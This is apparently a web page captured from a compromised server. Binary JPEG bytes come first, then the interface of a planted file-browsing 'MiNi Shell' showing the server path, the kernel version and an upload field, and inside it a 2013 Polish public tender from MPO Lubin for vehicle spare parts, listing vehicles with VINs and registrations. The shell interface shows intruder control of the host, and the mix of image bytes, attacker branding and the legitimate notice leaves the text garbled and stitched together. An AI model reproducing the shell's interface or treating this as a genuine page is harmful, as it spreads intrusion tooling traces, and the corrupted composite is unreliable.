JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130123/12657-N-2013.html

<p class="kh_header"><b>Lubin: Dostawa części zamiennych do pojazdów Miejskiego Przedsiębiorstwa Oczyszczania Spółka z o. o. w Lubinie</b><br>
<b>Numer ogłoszenia: 12657 - 2013; data zamieszczenia: 23.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania Spółka z ograniczoną odpowiedzialnością , ul. Rynek 28, 59-300 Lubin, woj. dolnośląskie, tel. (76) 7249940, faks (76) 7249950.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpo.lubin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa części zamiennych do pojazdów Miejskiego Przedsiębiorstwa Oczyszczania Spółka z o. o. w Lubinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowych części zamiennych do pojazdów MPO Sp. z o. o., których rodzaj i ilość określono w załączniku nr 1a do SIWZ (wykaz części - formularz cenowy), z podziałem na zadania od nr 1 do nr 8, gdzie zgodnie z art. 34 ust.5 ustawy pzp. (prawo opcji) określono:
1) zamówienia podstawowe (gwarantowane), 2) zamówienie opcjonalne. WARUNKI PRAWA OPCJI: a) skorzystanie z zamówienia opcjonalnego (prawa opcji) - rozszerzenie zamówienia uzależnione będzie od wysokości środków finansowych lub/i rzeczywistych potrzeb Zamawiającego; b) termin, w ciągu którego Zamawiający ma prawo skorzystać z prawa opcji - w terminie trwania umowy; c) o zamiarze skorzystania z prawa opcji w określonym zakresie, Zamawiający poinformuje Wykonawcę odrębnym pismem/oświadczeniem; d) wykonawcy zobowiązani są do realizacji zamówienia przewidzianego prawem opcji wg warunków opisanych w SIWZ i ofercie złożonej przez Wykonawcę.
Określenie przedmiotu zamówienia za pomocą nazw i kodów ze Wspólnego Słownika Zamówień CPV: 34300000-0 - Części i akcesoria do pojazdów i silników do nich.
Szczegółowy opis przedmiotu zamówienia w SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 20 % wartości zamówienia polegających na powtórzeniu tego samego rodzaju zamówienia dla każdego z zadań.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany formularz oferty - zgodnie ze wzorem stanowiącym załacznik nr 1 do SIWZ i wypełniony i podpisany wykaz części - formularz cenowy dla zadania(ń) na które Wykonawca składa ofertę  - zgodnie z załącznikiem nr 1 a do SIWZ.
2) Pełnomocnictwo wystawione dla osoby podpisującej ofertę - tylko w przypadku, jeżeli uprawnienie do podpisania oferty i reprezentowania podmiotu nie wynika z dokumentów załączonych do oferty, mianowicie: - Jeżeli uprawnienie do reprezentowania osoby podpisującej ofertę nie wynika z załączonych dokumentów do oferty należy dołączyć pełnomocnictwo w oryginale lub w postaci kopii poświadczonej za zgodność z oryginałem przez notariusza. - W oparciu o art. 26 ust. 3 i 4 ustawy, w zakresie odnoszącym się do pełnomocnictw, będziemy występować do Wykonawców będących osobami fizycznymi o uzupełnienie lub wyjaśnienie upoważnienia do podpisania oferty. Dla Wykonawców będących osobami fizycznymi wskazane powyżej zaświadczenie będzie właśnie dokumentem potwierdzającym prawo do złożenia podpisu.
3) Dokument ustanawiający pełnomocnika i upoważniający go do podpisywania oferty oraz reprezentowania podmiotów występujących wspólnie w niniejszym postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.- tylko w przypadku złożenia oferty wspólnej.
4) Oświadczenia i dokumenty wymagane postanowieniami rozdz. X SIWZ, tj. 
- Oświadczenie o spełnieniu warunków udziału w postępowaniu - wzór dokumentu stanowi załącznik nr 2 do SIWZ.
- Oświadczenie o braku podstaw do wykluczenia - wzór dokumentu stanowi załącznik nr 3 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian zawartej umowy:
a) w przypadku zmiany danych lub przekształcenia podmiotu (strony umowy - Wykonawcy)
b) w przypadku zmiany prawa podatkowego w zakresie podatku VAT na dostawy objęte umową
c) w przypadku zastosowania przez Zamawiającego zapisu § 5 ust. 3 wynagrodzenie określone w § 5 ust. 1 zmieni się proporcjonalnie ( W przypadku zaoferowania różnych cen na ten sam rodzaj części w zamówieniu podstawowym i opcjonalnym, Zamawiający ma pierwszeństwo zakupu części, z niższą ceną.)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpo.lubin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Oczyszczania Spółka z ograniczoną odpowiedzialnością 
ul. Rynek 28
59-300 Lubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2013 godzina 14:00, miejsce: Miejskie Przedsiębiorstwo Oczyszczania Spółka z ograniczoną odpowiedzialnością 
ul. Rynek 28
59-300 Lubin 
pokój nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - części zamienne do pojazdów wyszczególnionych w załączniku nr 1a (wykaz części - formularz cenowy) do SIWZ dla zadania nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa fabrycznie nowych części zamiennych (zamówienie podstawowe + zamówienie opcjonalne) do pojazdów:
-JELCZ 325 P, VIN 21099, nr rej. DLU 13413, poj silnika 11100cm3, rok produkcji 1992,
-JELCZ 325 JPH1, VIN SUJP325POE0011967, nr rej. DLU 15387 , poj. silnika 11100cm3,rok produkcji 1986,
-JELCZ 325, VIN 20581, nr rej. DLU 13412, poj silnika 11100 cm3, rok produkcji 1991
-JELCZ 422 240 R6, VIN SUJP422BAV0000454, nr rej. DLU 15471, poj silnika  11000cm3,rok produkcji 1997 							
-JELCZ 422 240 R6, VIN SUJP422BAT0000346, nr rej. DLU 03581, poj silnika 11000 cm3,rok produkcji 1996 							
-JELCZ 422 240 R6, VIN SUJP422BAT0000400, nr rej. DLU 00418, poj silnika 11000 cm3,rok produkcji 1996  							
-LIAZ 110.850, VIN TNKK54101KS000246, nr rej. DLU 15386, rok produkcji 1989, poj. silnika 11940 cm3							
-LIAZ 110.850, VIN D2FD0018, nr rej. DLU 95XA, rok produkcji 1988, poj. silnika 11940 cm3							
-MAN TGM/K, VIN WMAN082208Y215447, nr rej DLU 28XL, poj silnika 6871 cm, rok produkcji 2008.							
-MAN TGS-26 320 EKOCEL, VIN WMA24SZZ79W134754, nr rej. DW 126KR, poj silnika 10518 cm3, rok produkcji 2009							
-RENAULT PREMIUM 410TDI T20-62, VIN VF624DPA000000192, nr rej DLU 29XW, poj silnika 10837 cm3, rok produkcji 2008.							
- Scania 94D 260 EKOCEL, VIN YS296X20001280243, nr rej DLU R928, poj silnika 8970 cm3, rok produkcji 2002							
-VOLVO FM9 260 EKOPRESS, VIN YV2JHC0CX5A599506, nr rej. DLU 1V95, poj silnika 9364 cm3, rok produkcji 2005							
-VOLVO FL6L BSK6, VIN YV2E4CAA44B354400, nr rej. DLU 1G05, poj silnika 5480 cm3, rok produkcji 2003							
-VOLVO FL6 W, VIN YV2E4CAA35B391679, nr rej DLU 9U49, poj silnika 5480 cm3, rok produkcji 2004							
-Scania 94G 220 EKOPRESS MEDIUM, VIN YS2P4X20001242965, nr rej DLU A519, poj silnika 9000 cm3, rok produkcji 1999							
-SCANIA P270 EKOPRESS, VIN XLEP6X20005205490, nr rej. DLU 81WE, poj silnika 8867 cm3, rok produkcji 2008							
-STAR 742, VIN SUSAFA2B5MA000217, nr rej DLU 15639, poj silnika 6830 cm3, rok produkcji 1992, moc 45 kW.							
- STAR 1500 1142, VIN DLU001030058, nr rej. DLU U611, poj silnika 6842 cm3, moc 110 kW, rok produkcji 2000							
-STAR  1500 1142, VIN SUS1142CFX0014966, nr rej. DLU U609, poj. silnika 6842cm3, moc 110 kW, rok produkcji 1999  - zgodnie z załącznikiem nr 1a do SIWZ (wykaz części - formularz cenowy) dla zadania nr 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - części zamienne do pojazdów wyszczególnionych w załączniku nr 1a do SIWZ (wykaz części - formularz cenowy) dla zadania nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa fabrycznie nowych części zamiennych (z wyszczególnieniem na zamówienie podstawowe i opcjonalne) do pojazdów:
-CRAFTER 2FJE2, VIN WV1ZZZ2F87007872, nr rej. DLU 08VW,  poj. silnika 2461 cm3, rok produkcji 2008							
-CRAFTER 2FJZ,   VIN WV1ZZZ2FZ97002560, nr rej. DLU 14WS,  poj. silnika 2461 cm3, rok produkcji 2008							
-CRAFTER 2FJZ,   VIN WV1ZZZ2FZ87003818, nr rej. DLU 98NW, poj. silnika 2498 cm3, rok produkcji 2007	
-CRAFTER 2FJZ,   VIN WV1ZZZ2F87003819, nr rej. DLU 94NW, poj. silnika 2498 cm3, rok produkcji 2007							
-VW Passat, VIN WVWZZZ3CZAP025813, rok produkcji 2009, poj silnika 2000 cm3, nr rej. DLU 04601							
-VW T5, VIN WV1ZZZ7JZAX203323, nr rej DLU 04576, poj silnika1968 cm3, rok produkcji 2009.							
-Renault Megane Scenic, VIN  VF1JA0G0517367093, poj silnika 1998 cm3, rok produkcji 1997							
-VW T4, VIN  WV1ZZZ70Z1X047057, poj silnika 2461 cm3, rok produkcji 2000.							
-Żuk, VIN   SUL16121IT0580411, poj silnika 2417 cm3, rok produkcji 1996. - zgodnie z załącznikiem nr 1a do SIWZ (wykaz części - formularz cenowy) dla zadania nr 2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - części zamienne do pojazdów wyszczególnionych w załączniku nr 1a do SIWZ (wykaz części - formularz cenowy) dla zadania nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa fabrycznie nowych części zamiennych ( z wyszczególnieniem na zamówienie podstawowe i opcjonalne) do pojazdów: 
-MT8 150.32, VIN 2019, nr rej. DLU 21MJ, poj silnika 1551 cm3, rok produkcji 1995.							
-NEW HOLLAND TCE 50, VIN HSSZ16610, nr rej DLU 1M49, poj silnika 2189 cm3, rok produkcji 2007.							
-Ostrówek KT-162, VIN  646668, nr rej DLU 25MJ, poj silnika 3120 cm3, rok produkcji 1992.							
- URSUS C 360, VIN 658185,nr rej. DLU 13MJ, poj silnika 3120 cm, rok produkcji 1992.							
- PRONAR MTZ 32, VIN 01270A, nr rej DLU M531, poj silnika 1758 cm3, rok produkcji 2005. - zgodnie z załącznikiem nr 1a do SIWZ (wykaz części - formularz cenowy) dla zadania nr 3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 -filtry do pojazdów i sprzęty MPO Sp. z o.o. w lubinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa fabrycznie nowych filtrów do pojazdów i sprzętu MPO Sp. z o.o. w Lubinie (z wyszczególnieniem zamówienia podstawowego i opcjonalnego) - zgodnie z załącznikiem nr 1a (wykaz części - formularz cenowy) dla zadania nr 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - Dostawa żarówek do pojazdów i sprzętu MPO Sp. z o. o. w Lubinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa fabrycznie nowych żarówek do pojazdów i sprzętu MPO Sp. z o.o. w Lubinie (z wyszczególnieniem zamówienia podstawowego i opcjonalnego) - zgodnie z załącznikiem nr 1a (wykaz części - formularz cenowy) dla zadania nr 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - Dostawa akumulatorów ołowiowo-kwasowych do pojazdów i sprzętu MPO Sp. z o. o..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa fabrycznie nowych akumulatorów ołowiowo-kwasowych do pojazdów i sprzętu MPO Sp. z o.o. w Lubinie (z wyszczególnieniem zamówienia podstawowego i opcjonalnego) - zgodnie z załącznikiem nr 1a (wykaz części - formularz cenowy) dla zadania nr 6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - Dostawa lamp błyskowych 12V/24V do pojazdów i sprzętu MPO Sp. z o. o. w Lubinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa fabrycznie nowych lamp błyskowych 12V/24V do pojazdów i sprzętu MPO Sp. z o.o. w Lubinie (z wyszczególnieniem zamówienia podstawowego i opcjonalnego) - zgodnie z załącznikiem nr 1a (wykaz części - formularz cenowy) dla zadania nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - Dostawa elementów blacharskich i tapicerskich do pojazdów i sprzętu MPO Sp. z o. o. w Lubinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa fabrycznie nowych elementów blacharskich i tapicerskich do pojazdów i sprzętu MPO Sp. z o.o. w Lubinie (z wyszczególnieniem zamówienia podstawowego i opcjonalnego) - zgodnie z załącznikiem nr 1a (wykaz części - formularz cenowy) dla zadania nr 8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com